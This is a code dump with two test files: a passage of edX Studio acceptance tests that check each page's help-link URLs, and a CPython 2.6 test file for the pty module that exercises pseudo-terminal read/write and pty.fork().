page=self.dashboard_page,
href=href,
help_text='Getting Started with edX Studio',
as_list_item=True
)
@attr(shard=10)
class NewLibraryHelpTest(AcceptanceTest):
"""
Test help links while creating a new library
"""
def setUp(self):
super(NewLibraryHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.dashboard_page = DashboardPage(self.browser)
self.auth_page.visit()
self.dashboard_page.visit()
self.assertTrue(self.dashboard_page.has_new_library_button)
self.dashboard_page.click_new_library()
def test_library_create_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Create a New Library' page in the dashboard.
Given that I am on the 'Create a New Library' page in the dashboard.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.dashboard_page,
href=href
)
def test_library_create_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Create a New Library' page in the dashboard.
Given that I am on the 'Create a New Library' page in the dashboard.
And I want help about the process
And I click the 'Getting Started with edX Studio' in the sidebar links
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.dashboard_page,
href=href,
help_text='Getting Started with edX Studio',
as_list_item=True
)
@attr(shard=10)
class LibraryTabHelpTest(AcceptanceTest):
"""
Test help links on the library tab present at dashboard.
"""
def setUp(self):
super(LibraryTabHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.dashboard_page = DashboardPage(self.browser)
self.auth_page.visit()
self.dashboard_page.visit()
def test_library_tab_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Home'(Libraries tab) page.
Given that I am on the 'Home'(Libraries tab) page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
self.assertTrue(self.dashboard_page.has_new_library_button)
click_css(self.dashboard_page, '#course-index-tabs .libraries-tab', 0, False)
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.dashboard_page,
href=href
)
@attr(shard=10)
class LibraryHelpTest(StudioLibraryTest):
"""
Test help links on a Library page.
"""
def setUp(self):
super(LibraryHelpTest, self).setUp()
self.library_page = LibraryPage(self.browser, self.library_key)
self.library_user_page = LibraryUsersPage(self.browser, self.library_key)
def test_library_content_nav_help(self):
"""
Scenario: Help link in navigation bar is working on the content
library page (click a library on the Library list page).
Given that I am on the content library page (click a library on the Library list page).
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_components/libraries.html'
"""
self.library_page.visit()
# The href we want to see in anchor help element.
href = "http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/" \
"en/latest/course_components/libraries.html"
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_page,
href=href
)
def test_library_content_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on the
content library page (click a library on the Library list page).
Given that I am on the content library page (click a library on the Library list page).
And I want help about the process
And I click the 'Learn more about content libraries' in the sidebar links
Then Help link should open.
And help url should end with 'course_components/libraries.html'
"""
self.library_page.visit()
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_components/libraries.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.library_page,
href=href,
help_text='Learn more about content libraries'
)
def test_library_user_access_setting_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'User Access'
settings page of library.
Given that I am on the 'User Access' settings page of library.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with
'course_components/libraries.html#give-other-users-access-to-your-library'
"""
self.library_user_page.visit()
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#give-other-users-access-to-your-library'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_user_page,
href=href
)
@attr(shard=10)
class LibraryImportHelpTest(StudioLibraryTest):
"""
Test help links on a Library import and export pages.
"""
def setUp(self):
super(LibraryImportHelpTest, self).setUp()
self.library_import_page = ImportLibraryPage(self.browser, self.library_key)
self.library_import_page.visit()
def test_library_import_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Library import page.
Given that I am on the Library import page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_components/libraries.html#import-a-library'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#import-a-library'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_import_page,
href=href
)
def test_library_import_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on Library import page.
Given that I am on the Library import page.
And I want help about the process
And I click the 'Learn more about importing a library' in the sidebar links
Then Help link should open.
And help url should end with 'course_components/libraries.html#import-a-library'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#import-a-library'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.library_import_page,
href=href,
help_text='Learn more about importing a library'
)
@attr(shard=10)
class LibraryExportHelpTest(StudioLibraryTest):
"""
Test help links on a Library export pages.
"""
def setUp(self):
super(LibraryExportHelpTest, self).setUp()
self.library_export_page = ExportLibraryPage(self.browser, self.library_key)
self.library_export_page.visit()
def test_library_export_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Library export page.
Given that I am on the Library export page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_components/libraries.html#export-a-library'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#export-a-library'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.library_export_page,
href=href
)
def test_library_export_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on Library export page.
Given that I am on the Library export page.
And I want help about the process
And I click the 'Learn more about exporting a library' in the sidebar links
Then Help link should open.
And help url should end with 'course_components/libraries.html#export-a-library'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/course_components/libraries.html#export-a-library'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.library_export_page,
href=href,
help_text='Learn more about exporting a library'
)
@attr(shard=10)
class NewProgramHelpTest(ProgramsConfigMixin, AcceptanceTest):
"""
Test help links on a 'New Program' page
"""
def setUp(self):
super(NewProgramHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.program_page = DashboardPageWithPrograms(self.browser)
self.auth_page.visit()
self.set_programs_api_configuration(True)
self.program_page.visit()
def test_program_create_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'New Program' page
Given that I am on the 'New Program' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'index.html'
"""
self.program_page.click_new_program_button()
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/index.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.program_page,
href=href,
)
@attr(shard=10)
class CourseOutlineHelpTest(StudioCourseTest):
"""
Tests help links on course outline page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(CourseOutlineHelpTest, self).setUp()
self.course_outline_page = CourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_outline_page.visit()
@skip("This scenario depends upon TNL-5460")
def test_course_outline_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Course Outline page
Given that I am on the Course Outline page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'developing_course/course_outline.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/developing_course/course_outline.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_outline_page,
href=href
)
def test_course_outline_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on Course Outline page
Given that I am on the Course Outline page.
And I want help about the process
And I click the 'Learn more about the course outline' in the sidebar links
Then Help link should open.
And help url should end with 'developing_course/course_outline.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/developing_course/course_outline.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_outline_page,
href=href,
help_text='Learn more about the course outline',
index=0
)
@attr(shard=10)
class CourseUpdateHelpTest(StudioCourseTest):
"""
Test help links on Course Update page
"""
def setUp(self): # pylint: disable=arguments-differ
super(CourseUpdateHelpTest, self).setUp()
self.course_update_page = CourseUpdatesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_update_page.visit()
def test_course_update_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Course Update' page
Given that I am on the 'Course Update' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_assets/handouts_updates.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_assets/handouts_updates.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_update_page,
href=href
)
@attr(shard=10)
class AssetIndexHelpTest(StudioCourseTest):
"""
Test help links on Course 'Files & Uploads' page
"""
def setUp(self): # pylint: disable=arguments-differ
super(AssetIndexHelpTest, self).setUp()
self.course_asset_index_page = AssetIndexPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_asset_index_page.visit()
def test_asset_index_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Files & Uploads' page
Given that I am on the 'Files & Uploads' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_assets/course_files.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_assets/course_files.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_asset_index_page,
href=href
)
def test_asset_index_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Files & Uploads' page
Given that I am on the 'Files & Uploads' page.
And I want help about the process
And I click the 'Learn more about managing files' in the sidebar links
Then Help link should open.
And help url should end with 'course_assets/course_files.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_assets/course_files.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_asset_index_page,
href=href,
help_text='Learn more about managing files'
)
@attr(shard=10)
class CoursePagesHelpTest(StudioCourseTest):
"""
Test help links on Course 'Pages' page
"""
def setUp(self): # pylint: disable=arguments-differ
super(CoursePagesHelpTest, self).setUp()
self.course_pages_page = PagesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_pages_page.visit()
def test_course_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Pages' page
Given that I am on the 'Pages' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_assets/pages.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_assets/pages.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_pages_page,
href=href
)
@attr(shard=10)
class UploadTextbookHelpTest(StudioCourseTest):
"""
Test help links on Course 'Textbooks' page
"""
def setUp(self): # pylint: disable=arguments-differ
super(UploadTextbookHelpTest, self).setUp()
self.course_textbook_upload_page = TextbookUploadPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_textbook_upload_page.visit()
def test_course_textbook_upload_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Textbooks' page
Given that I am on the 'Textbooks' page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'course_assets/textbooks.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/course_assets/textbooks.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_textbook_upload_page,
href=href
)
def test_course_textbook_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Textbooks' page
Given that I am on the 'Textbooks' page
And I want help about the process
And I click the 'Learn more about textbooks' in the sidebar links
Then Help link should open.
And help url should end with 'course_assets/textbooks.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/course_assets/textbooks.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_textbook_upload_page,
href=href,
help_text='Learn more about textbooks'
)
@attr(shard=10)
class StudioUnitHelpTest(ContainerBase):
"""
Tests help links on Unit page.
"""
def setUp(self, is_staff=True):
super(StudioUnitHelpTest, self).setUp(is_staff=is_staff)
def populate_course_fixture(self, course_fixture):
"""
Populates the course fixture.
We are modifying 'advanced_modules' setting of the
course.
Also add a section with a subsection and a unit.
"""
course_fixture.add_advanced_settings(
{u"advanced_modules": {"value": ["split_test"]}}
)
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit')
)
)
)
def test_unit_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Unit page.
Given that I am on the Unit page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'developing_course/course_units.html'
"""
unit_page = self.go_to_unit_page()
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/developing_course/course_units.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=unit_page,
href=href
)
@attr(shard=10)
class SettingsHelpTest(StudioCourseTest):
"""
Tests help links on Schedule and Details Settings page
"""
def setUp(self, is_staff=False, test_xss=True):
super(SettingsHelpTest, self).setUp()
self.settings_page = SettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.settings_page.visit()
def test_settings_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Settings page.
Given that I am on the Settings page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'set_up_course/setting_up_student_view.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/set_up_course/setting_up_student_view.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.settings_page,
href=href
)
@attr(shard=10)
class GradingPageHelpTest(StudioCourseTest):
"""
Tests help links on Grading page
"""
def setUp(self, is_staff=False, test_xss=True):
super(GradingPageHelpTest, self).setUp()
self.grading_page = GradingPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.grading_page.visit()
def test_grading_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Grading page.
Given that I am on the Grading page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'grading/index.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/grading/index.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.grading_page,
href=href
)
@attr(shard=10)
class CourseTeamSettingsHelpTest(StudioCourseTest):
"""
Tests help links on Course Team settings page
"""
def setUp(self, is_staff=False, test_xss=True):
super(CourseTeamSettingsHelpTest, self).setUp()
self.course_team_settings_page = CourseTeamPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_team_settings_page.visit()
def test_course_course_team_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Course Team settings page
Given that I am on the Course Team settings page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'set_up_course/course_staffing.html#add-course-team-members'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/set_up_course/course_staffing.html#add-course-team-members'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_team_settings_page,
href=href
)
@attr(shard=10)
class CourseGroupConfigurationHelpTest(StudioCourseTest):
"""
Tests help links on course Group Configurations settings page
"""
def setUp(self, is_staff=False, test_xss=True):
super(CourseGroupConfigurationHelpTest, self).setUp()
self.course_group_configuration_page = GroupConfigurationsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.course_group_configuration_page.visit()
def test_course_group_conf_nav_help(self):
"""
Scenario: Help link in navigation bar is working on
Group Configurations settings page
Given that I am on the Group Configurations settings page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'index.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/index.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.course_group_configuration_page,
href=href
)
def test_course_group_conf_content_group_side_bar_help(self):
"""
Scenario: Help link in side bar under the 'content group' is working
on Group Configurations settings page
Given that I am on the Group Configurations settings page
And I want help about the process
And I click the 'Learn More' in the sidebar links
Then Help link should open.
And help url should end with 'course_features/cohorts/cohorted_courseware.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/course_features/cohorts/cohorted_courseware.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.course_group_configuration_page,
href=href,
help_text='Learn More'
)
@attr(shard=10)
class AdvancedSettingHelpTest(StudioCourseTest):
"""
Tests help links on course Advanced Settings page.
"""
def setUp(self, is_staff=False, test_xss=True):
super(AdvancedSettingHelpTest, self).setUp()
self.advanced_settings = AdvancedSettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.advanced_settings.visit()
def test_advanced_settings_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Advanced Settings page.
Given that I am on the Advanced Settings page.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'index.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/index.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.advanced_settings,
href=href
)
@attr(shard=10)
class CertificatePageHelpTest(StudioCourseTest):
"""
Tests help links on course Certificate settings page.
"""
def setUp(self, is_staff=False, test_xss=True):
super(CertificatePageHelpTest, self).setUp()
self.certificates_page = CertificatesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.certificates_page.visit()
def test_certificate_page_nav_help(self):
"""
Scenario: Help link in navigation bar is working on Certificate settings page
Given that I am on the Certificate settings page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'set_up_course/creating_course_certificates.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/set_up_course/creating_course_certificates.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.certificates_page,
href=href
)
def test_certificate_page_side_bar_help(self):
"""
        Scenario: Help link in side bar is working on Certificate settings page
Given that I am on the Certificate settings page
And I want help about the process
And I click the 'Learn more about certificates' in the sidebar links
Then Help link should open.
And help url should end with 'set_up_course/creating_course_certificates.html'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/set_up_course/creating_course_certificates.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.certificates_page,
href=href,
help_text='Learn more about certificates',
)
@attr(shard=10)
class GroupExperimentConfigurationHelpTest(ContainerBase):
"""
    Tests help links on the course Group Configurations settings page,
    specifically the Experiment Group Configurations section.
"""
def setUp(self): # pylint: disable=arguments-differ
super(GroupExperimentConfigurationHelpTest, self).setUp()
self.group_configuration_page = GroupConfigurationsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
# self.create_poorly_configured_split_instance()
self.group_configuration_page.visit()
def populate_course_fixture(self, course_fixture):
"""
Populates the course fixture.
        We are modifying the 'advanced_modules' setting of the
        course.
"""
course_fixture.add_advanced_settings(
{u"advanced_modules": {"value": ["split_test"]}}
)
def test_course_group_configuration_experiment_side_bar_help(self):
"""
Scenario: Help link in side bar under the 'Experiment Group Configurations'
is working on Group Configurations settings page
Given that I am on the Group Configurations settings page
And I want help about the process
And I click the 'Learn More' in the sidebar links
Then Help link should open.
And help url should end with
'content_experiments_configure.html#set-up-group-configurations-in-edx-studio'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/latest/course_features' \
'/content_experiments/content_experiments_configure.html#set-up-group-configurations-in-edx-studio'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.group_configuration_page,
href=href,
help_text='Learn More',
)
@attr(shard=10)
class ToolsImportHelpTest(StudioCourseTest):
"""
Tests help links on tools import pages.
"""
def setUp(self, is_staff=False, test_xss=True):
super(ToolsImportHelpTest, self).setUp()
self.import_page = ImportCoursePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.import_page.visit()
def test_tools_import_nav_help(self):
"""
        Scenario: Help link in navigation bar is working on the course import page
        Given that I am on the course import page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'releasing_course/export_import_course.html#import-a-course'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/releasing_course/export_import_course.html#import-a-course'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.import_page,
href=href
)
def test_tools_import_side_bar_help(self):
"""
        Scenario: Help link in side bar is working on the course import page
        Given that I am on the course import page
And I want help about the process
And I click the 'Learn more about importing a course' in the sidebar links
Then Help link should open.
And help url should end with 'releasing_course/export_import_course.html#import-a-course'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/releasing_course/export_import_course.html#import-a-course'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.import_page,
href=href,
help_text='Learn more about importing a course',
)
@attr(shard=10)
class ToolsExportHelpTest(StudioCourseTest):
"""
Tests help links on tools export pages.
"""
def setUp(self, is_staff=False, test_xss=True):
super(ToolsExportHelpTest, self).setUp()
self.export_page = ExportCoursePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.export_page.visit()
    def test_tools_export_nav_help(self):
"""
        Scenario: Help link in navigation bar is working on the course export page
        Given that I am on the course export page
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'releasing_course/export_import_course.html#export-a-course'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/releasing_course/export_import_course.html#export-a-course'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.export_page,
href=href
)
    def test_tools_export_side_bar_help(self):
"""
        Scenario: Help link in side bar is working on the course export page
        Given that I am on the course export page
And I want help about the process
And I click the 'Learn more about exporting a course' in the sidebar links
Then Help link should open.
And help url should end with 'releasing_course/export_import_course.html#export-a-course'
"""
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/' \
'latest/releasing_course/export_import_course.html#export-a-course'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.export_page,
href=href,
help_text='Learn more about exporting a course',
)
@attr(shard=10)
class StudioWelcomeHelpTest(AcceptanceTest):
"""
    Tests help link on 'Welcome' page (user not logged in)
"""
def setUp(self):
super(StudioWelcomeHelpTest, self).setUp()
self.index_page = IndexPage(self.browser)
self.index_page.visit()
def test_welcome_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Welcome' page (User not logged in).
Given that I am on the 'Welcome' page.
        And I want help about edX
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should contain 'getting_started/get_started.html'
"""
# The url we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.index_page,
href=href,
signed_in=False
)
| agpl-3.0 |
mancoast/CPythonPyc_test | cpython/265_test_pty.py | 58 | 7437 | import errno
import fcntl
import pty
import os
import sys
import signal
from test.test_support import verbose, TestSkipped, run_unittest
import unittest
TEST_STRING_1 = "I wish to buy a fish license.\n"
TEST_STRING_2 = "For my pet fish, Eric.\n"
if verbose:
def debug(msg):
print msg
else:
def debug(msg):
pass
def normalize_output(data):
# Some operating systems do conversions on newline. We could possibly
# fix that by doing the appropriate termios.tcsetattr()s. I couldn't
# figure out the right combo on Tru64 and I don't have an IRIX box.
# So just normalize the output and doc the problem O/Ses by allowing
# certain combinations for some platforms, but avoid allowing other
# differences (like extra whitespace, trailing garbage, etc.)
# This is about the best we can do without getting some feedback
    # from someone more knowledgeable.
# OSF/1 (Tru64) apparently turns \n into \r\r\n.
if data.endswith('\r\r\n'):
return data.replace('\r\r\n', '\n')
# IRIX apparently turns \n into \r\n.
if data.endswith('\r\n'):
return data.replace('\r\n', '\n')
return data
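# A minimal sanity sketch (added for illustration; not part of the original
# suite). These pure string assertions hold on any platform and document the
# mapping performed above:
assert normalize_output('hi\r\r\n') == 'hi\n'  # OSF/1 (Tru64) style
assert normalize_output('hi\r\n') == 'hi\n'    # IRIX style
assert normalize_output('hi\n') == 'hi\n'      # already normalized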
# Marginal testing of pty suite. Cannot do extensive 'do or fail' testing
# because pty code is not too portable.
# XXX(nnorwitz): these tests leak fds when there is an error.
class PtyTest(unittest.TestCase):
def setUp(self):
# isatty() and close() can hang on some platforms. Set an alarm
# before running the test to make sure we don't hang forever.
self.old_alarm = signal.signal(signal.SIGALRM, self.handle_sig)
signal.alarm(10)
def tearDown(self):
# remove alarm, restore old alarm handler
signal.alarm(0)
signal.signal(signal.SIGALRM, self.old_alarm)
def handle_sig(self, sig, frame):
self.fail("isatty hung")
def test_basic(self):
try:
debug("Calling master_open()")
master_fd, slave_name = pty.master_open()
debug("Got master_fd '%d', slave_name '%s'" %
(master_fd, slave_name))
debug("Calling slave_open(%r)" % (slave_name,))
slave_fd = pty.slave_open(slave_name)
debug("Got slave_fd '%d'" % slave_fd)
except OSError:
# " An optional feature could not be imported " ... ?
raise TestSkipped, "Pseudo-terminals (seemingly) not functional."
self.assertTrue(os.isatty(slave_fd), 'slave_fd is not a tty')
# Solaris requires reading the fd before anything is returned.
# My guess is that since we open and close the slave fd
# in master_open(), we need to read the EOF.
# Ensure the fd is non-blocking in case there's nothing to read.
orig_flags = fcntl.fcntl(master_fd, fcntl.F_GETFL)
fcntl.fcntl(master_fd, fcntl.F_SETFL, orig_flags | os.O_NONBLOCK)
try:
s1 = os.read(master_fd, 1024)
self.assertEquals('', s1)
except OSError, e:
if e.errno != errno.EAGAIN:
raise
# Restore the original flags.
fcntl.fcntl(master_fd, fcntl.F_SETFL, orig_flags)
debug("Writing to slave_fd")
os.write(slave_fd, TEST_STRING_1)
s1 = os.read(master_fd, 1024)
self.assertEquals('I wish to buy a fish license.\n',
normalize_output(s1))
debug("Writing chunked output")
os.write(slave_fd, TEST_STRING_2[:5])
os.write(slave_fd, TEST_STRING_2[5:])
s2 = os.read(master_fd, 1024)
self.assertEquals('For my pet fish, Eric.\n', normalize_output(s2))
os.close(slave_fd)
os.close(master_fd)
def test_fork(self):
debug("calling pty.fork()")
pid, master_fd = pty.fork()
if pid == pty.CHILD:
# stdout should be connected to a tty.
if not os.isatty(1):
debug("Child's fd 1 is not a tty?!")
os._exit(3)
# After pty.fork(), the child should already be a session leader.
# (on those systems that have that concept.)
debug("In child, calling os.setsid()")
try:
os.setsid()
except OSError:
# Good, we already were session leader
debug("Good: OSError was raised.")
pass
except AttributeError:
# Have pty, but not setsid()?
debug("No setsid() available?")
pass
except:
# We don't want this error to propagate, escaping the call to
# os._exit() and causing very peculiar behavior in the calling
# regrtest.py !
# Note: could add traceback printing here.
debug("An unexpected error was raised.")
os._exit(1)
else:
debug("os.setsid() succeeded! (bad!)")
os._exit(2)
os._exit(4)
else:
debug("Waiting for child (%d) to finish." % pid)
# In verbose mode, we have to consume the debug output from the
# child or the child will block, causing this test to hang in the
# parent's waitpid() call. The child blocks after a
# platform-dependent amount of data is written to its fd. On
# Linux 2.6, it's 4000 bytes and the child won't block, but on OS
# X even the small writes in the child above will block it. Also
# on Linux, the read() will throw an OSError (input/output error)
# when it tries to read past the end of the buffer but the child's
# already exited, so catch and discard those exceptions. It's not
# worth checking for EIO.
while True:
try:
data = os.read(master_fd, 80)
except OSError:
break
if not data:
break
sys.stdout.write(data.replace('\r\n', '\n'))
##line = os.read(master_fd, 80)
##lines = line.replace('\r\n', '\n').split('\n')
##if False and lines != ['In child, calling os.setsid()',
## 'Good: OSError was raised.', '']:
## raise TestFailed("Unexpected output from child: %r" % line)
(pid, status) = os.waitpid(pid, 0)
res = status >> 8
debug("Child (%d) exited with status %d (%d)." % (pid, res, status))
if res == 1:
self.fail("Child raised an unexpected exception in os.setsid()")
elif res == 2:
self.fail("pty.fork() failed to make child a session leader.")
elif res == 3:
self.fail("Child spawned by pty.fork() did not have a tty as stdout")
elif res != 4:
self.fail("pty.fork() failed for unknown reasons.")
##debug("Reading from master_fd now that the child has exited")
##try:
## s1 = os.read(master_fd, 1024)
##except os.error:
## pass
##else:
## raise TestFailed("Read from master_fd did not raise exception")
os.close(master_fd)
# pty.fork() passed.
def test_main(verbose=None):
run_unittest(PtyTest)
if __name__ == "__main__":
test_main()
